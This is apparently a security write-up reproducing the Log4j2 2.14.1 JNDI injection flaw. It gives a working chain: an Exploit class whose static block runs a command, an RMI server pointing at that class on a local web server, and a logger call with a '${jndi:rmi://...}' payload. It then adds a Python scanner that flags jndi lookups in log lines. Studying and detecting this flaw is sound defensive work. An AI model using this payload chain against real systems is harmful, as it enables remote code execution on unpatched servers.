This article focuses on analysing why the JNDI injection in Log4j2 arises. It does not dwell on JNDI injection itself; there are plenty of analyses online to refer to for that, so it is not covered in detail here.
II. Reproducing the vulnerability
=======
The reproduction below uses Log4j2 version 2.14.1. The Maven dependencies are as follows:

```xml
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.1</version>
</dependency>
```
- Write the payload class `Exploit` and compile it to produce `Exploit.class`. The code is as follows:

```java
public class Exploit {
    // The static initializer runs as soon as the class is loaded,
    // so the command executes without any method being called explicitly.
    static {
        String cmd = "/Applications/Calculator.app/Contents/MacOS/Calculator";
        final Process process;
        try {
            process = Runtime.getRuntime().exec(cmd);
            process.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
- Run `python3 -m http.server 8081` locally to start a web server listening on port 8081. Put the `Exploit.class` compiled in the previous step in the web server's root directory (the root directory is the working directory in which `python3 -m http.server 8081` is run).
- Write the RMI server `RMIServer`, then compile and run it. The code is as follows:

```java
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) throws Exception {
        // RMI registry on the default port 1099
        Registry registry = LocateRegistry.createRegistry(1099);
        // Reference pointing at the Exploit class served by the HTTP server started above
        Reference exploit = new Reference("Exploit", "Exploit", "http://127.0.0.1:8081/");
        ReferenceWrapper exploitWrapper = new ReferenceWrapper(exploit);
        // Bind it under the name "exp", which the JNDI lookup in the PoC resolves
        registry.bind("exp", exploitWrapper);
    }
}
```
- Write the PoC, then compile and run it. The code and the result of running it are as follows:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4j2RCEPoc {
    public static final Logger LOGGER = LogManager.getLogger(Log4j2RCEPoc.class);

    public static void main(String[] args) {
        // The ${jndi:...} lookup in the logged message is resolved by Log4j2 itself
        LOGGER.error("${jndi:rmi://127.0.0.1:1099/exp}");
    }
}
```
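The PoC above shows the trigger condition: a `${jndi:...}` lookup expression reaching a Log4j2 logger inside the message text. The defender's counterpart is to notice such expressions in logs or inbound data before or after they have been processed. The following scanner is an added example, not code from the original article; it extracts balanced `${...}` lookup expressions from each line, reads the lookup prefix (the part before the first colon), and reports only those whose prefix is `jndi`, together with the URI scheme and host:port for triage. The log lines, the `Finding` type and the `DANGEROUS_PREFIXES` set are all constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Lookup prefixes that warrant an alert when they appear inside a logged message.
# Log4j2 ships many harmless lookups (date, env, ctx, ...), so only "jndi" is listed.
DANGEROUS_PREFIXES = {"jndi"}

# Matches "scheme://host[:port]" at the start of the text following the lookup prefix.
_URI_RE = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*)://([^/\s]*)")


@dataclass
class Finding:
    line_no: int            # 1-based line number in the scanned input
    expression: str         # the full ${...} expression as it appeared
    prefix: str             # lookup prefix, e.g. "jndi"
    scheme: Optional[str]   # URI scheme after the prefix, e.g. "rmi", if present
    target: Optional[str]   # host[:port] part of the URI, if present


def extract_lookups(text: str) -> List[str]:
    """Return every outermost balanced ${...} expression in text.

    Braces are counted so that nested expressions are returned as one unit;
    an unbalanced "${" with no closing brace is ignored.
    """
    exprs: List[str] = []
    i = 0
    while True:
        start = text.find("${", i)
        if start == -1:
            return exprs
        depth = 0
        j = start
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    exprs.append(text[start:j + 1])
                    break
            j += 1
        else:
            # Ran off the end without closing the expression: nothing more to extract.
            return exprs
        i = j + 1


def classify(expr: str) -> Tuple[str, Optional[str], Optional[str]]:
    """Split "${prefix:rest}" into (prefix, uri scheme, uri host[:port])."""
    body = expr[2:-1]
    prefix, _, rest = body.partition(":")
    prefix = prefix.strip().lower()
    scheme = target = None
    m = _URI_RE.match(rest)
    if m:
        scheme, target = m.group(1).lower(), m.group(2)
    return prefix, scheme, target


def scan_log_lines(lines: List[str]) -> List[Finding]:
    """Return a Finding for every dangerous lookup expression in the given lines."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        for expr in extract_lookups(line):
            prefix, scheme, target = classify(expr)
            if prefix in DANGEROUS_PREFIXES:
                findings.append(Finding(n, expr, prefix, scheme, target))
    return findings


# Constructed sample log lines: one plain "${total}" placeholder (no lookup prefix),
# one harmless built-in lookup, the PoC payload from this article, and a normal line.
SAMPLE_LOG = [
    "2024-01-01 10:00:01 INFO  order total is ${total} for user alice",
    "2024-01-01 10:00:02 INFO  report generated on ${date:yyyy-MM-dd}",
    "2024-01-01 10:00:03 ERROR ${jndi:rmi://127.0.0.1:1099/exp}",
    "2024-01-01 10:00:04 INFO  plain line without any lookup syntax",
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.prefix} lookup via {f.scheme} to {f.target}: {f.expression}")
```

Only the third sample line is reported; `${total}` has no prefix and `${date:...}` is a benign built-in lookup. Because the extractor counts braces, an expression that contains further `${...}` lookups inside it is still returned as a single unit and its outermost prefix is what gets checked.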